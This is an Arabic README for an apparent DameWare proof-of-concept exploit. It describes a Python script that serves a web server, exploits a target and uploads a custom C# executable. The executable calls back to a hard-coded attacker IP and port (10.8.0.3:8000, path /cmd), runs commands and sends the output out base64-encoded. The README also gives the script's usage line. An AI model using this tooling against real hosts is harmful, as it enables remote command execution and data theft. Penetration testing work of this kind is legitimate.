
تم إنشاء هذا المستودع لاستخدام إثبات المفهوم (POC) الخاص بـ Nessus مع ملف تنفيذي مخصص بلغة C# لتنفيذ أوامر على مضيف بعيد والحصول على مخرجات الأمر.
يُستخدم ملف البايثون لبدء خادم ويب، وتنفيذ الاستغلال، ثم استرداد النتائج عبر خادم الويب.
يتم رفع ملف C# التنفيذي إلى الهدف عبر الاستغلال.
عند تنفيذه على الهدف، يقوم الملف التنفيذي بالاتصال مرة أخرى بالعنوان IP/Port المحدد للحصول على الأمر المطلوب تنفيذه (المسار هو /cmd).
بمجرد انتهاء الأمر، يرسل الملف التنفيذي المخرجات إلى نفس خادم الويب.
يتم إرسال المخرجات عبر طلب GET سيولّد خطأ 404، لكن لا بأس بذلك لأننا نريد بيانات base64 فقط.
يحتوي ملف C# التنفيذي على متغيرين يجب تحديثهما
يشير هذان المتغيران إلى عنوان IP ومنفذ النظام المهاجم
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
المثال أدناه يشغّل أمر net users على المضيف البعيد
